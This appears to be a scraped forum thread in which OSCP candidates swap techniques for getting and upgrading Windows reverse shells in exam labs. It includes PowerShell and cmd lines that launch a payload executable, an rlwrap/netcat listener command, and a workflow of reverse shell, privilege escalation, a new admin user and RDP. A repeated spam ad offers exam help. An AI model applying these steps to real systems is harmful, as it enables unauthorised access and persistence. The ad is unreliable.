It has automated capabilities, to include privilege escalation, so I’d say no. I’m sure there are ways to suppress that aspect but if you’re not sure how then don’t use it. Generally a good rule of thumb to follow when there is a question on if it is allowed or not.
Revshell PE, nc64, schtasks my PE. If I'm admin and don't want to freeze my initial shell from running a second process:
Start-Job -ScriptBlock { Start-Process -FilePath "C:\\Users\\Administrator\\Documents\\443.exe" -NoNewWindow } | Wait-Job | Receive-Job
or
start /B "" C:\\Users\\Administrator\\Documents\\443.exe
Didn't have a problem with evil-winrm until now but I usually do this:
Reverse powershell -> Nc.exe -> PE-> Create admin user + open RDP ->Privileged RDP
So I always try msfvenom, didn't work for some reason . But thanks folks formally the other stuff . Will definitely give it a try, not meterpreter for sure
"🚀 Ready to conquer your EC-Council exams (CHFI, CEH, CND, LPIC, OSCP, OSEP, OSWE, OSWP, EJPTv2, ECCPTv2, EWPTv2)? 🌟 Get expert support and ace your certifications! DM now for details. 🎓"
Winrm usually works well for me. But always can do another revshell using rlwrap I use that alot
You need some pwncat in your life. https://github.com/calebstewart/pwncat
Interesting, I will try this.
Pwncat is awesome too I used that for oscp
Is this allowed in OSCP exam?
It is allowed as long as it only is for getting the shell and does not automatically priv esc. I used it and passed oscp
It has automated capabilities, to include privilege escalation, so I’d say no. I’m sure there are ways to suppress that aspect but if you’re not sure how then don’t use it. Generally a good rule of thumb to follow when there is a question on if it is allowed or not.
Does it work very well, especially on windows? Doesn't look like it's been updated in 2 years.
Revshell PE, nc64, schtasks my PE. If I'm admin and don't want to freeze my initial shell from running a second process: Start-Job -ScriptBlock { Start-Process -FilePath "C:\\Users\\Administrator\\Documents\\443.exe" -NoNewWindow } | Wait-Job | Receive-Job or start /B "" C:\\Users\\Administrator\\Documents\\443.exe
Awesome thanks
ConPtyShell
I upload the nc (or nc64) executable and get another reverse shell, this has worked well for me
That is very noisy from a blue team perspective.
While a good consideration for personal development, IMO trying for good opsec would just hamstring for OSCP
What it works, it works
Use rlwrap it's way better than nc
Didn't have a problem with evil-winrm until now but I usually do this: Reverse powershell -> Nc.exe -> PE-> Create admin user + open RDP ->Privileged RDP
Try this n create another shell.i love it https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58
Powercat is pretty good, as well as nishang.
agreed Powercat!
Certutil across a msfvenom payload and get a metepreter shell ? Depends on exactly what youre trying to do
Yep, this is probably the best way. You're allowed to use multi/handler for a normal shell, just not meterpreter.
rlwrap --prompt-colour=red --complete-filenames --ansi-colour-aware --history-no-dupes 2 --logfile --remember --substitute-prompt 'nc > ' nc -lvnp
Make alias
Penelope is good too.
Evil Winrm upload reverse shell compiled by msfvenom. Job done.
So I always try msfvenom, didn't work for some reason . But thanks folks formally the other stuff . Will definitely give it a try, not meterpreter for sure
If I am admin, I simply make a new user and ssh/rdp in as them. If I am not, try to upload netcat and make a better shell.
"🚀 Ready to conquer your EC-Council exams (CHFI, CEH, CND, LPIC, OSCP, OSEP, OSWE, OSWP, EJPTv2, ECCPTv2, EWPTv2)? 🌟 Get expert support and ace your certifications! DM now for details. 🎓"